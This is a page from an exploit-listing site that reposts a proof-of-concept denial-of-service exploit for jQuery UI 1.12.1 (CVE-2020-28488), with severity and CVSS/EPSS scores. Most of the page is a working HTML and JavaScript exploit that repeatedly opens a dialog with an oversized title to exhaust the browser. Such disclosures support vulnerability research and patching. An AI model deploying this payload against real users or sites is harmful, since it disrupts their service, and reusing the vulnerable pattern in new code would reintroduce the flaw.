Advertisement






jQuery UI 1.12.1 Denial Of Service

CVE Category Price Severity
CVE-2020-28488 CWE-XXXX Unknown High
Author Risk Exploitation Type Date
Unknown Critical Remote 2021-01-29
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 0.02507 0.60761

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021010194

Below is a copy:

jQuery UI 1.12.1 Denial Of Service
# Exploit Title: jQuery UI 1.12.1 - Denial of Service (DoS)
# Date: 20 Jan, 2021
# Exploit Author: Rafael Cintra Lopes
# Vendor Homepage: https://jqueryui.com/
# Software Link: https://jqueryui.com/download/
# Version: <= 1.12.1
# CVE : CVE-2020-28488

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>DoS - jQuery UI 1.12.1</title>
</head>
<body>
    <h2>DoS - jQuery UI 1.12.1</h2>

    <div>
        <button onclick="exploit()">Exploit</button>
    </div>

    <p>PoC by Rafael Cintra Lopes</p>

    <script src="https://code.jquery.com/jquery-3.5.1.min.js" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"></script>
    <script src="https://code.jquery.com/ui/1.12.1/jquery-ui.min.js" integrity="sha256-VazP97ZCwtekAsvgPBSUwPFKdrwD3unUfSGVYrahUqU=" crossorigin="anonymous"></script>

    <script>
        function exploit(){
            for (var i = 0; i < 10; i++) {
                $("div").dialog({title:'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'});
            }
        }
    </script>
</body>
</html>

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum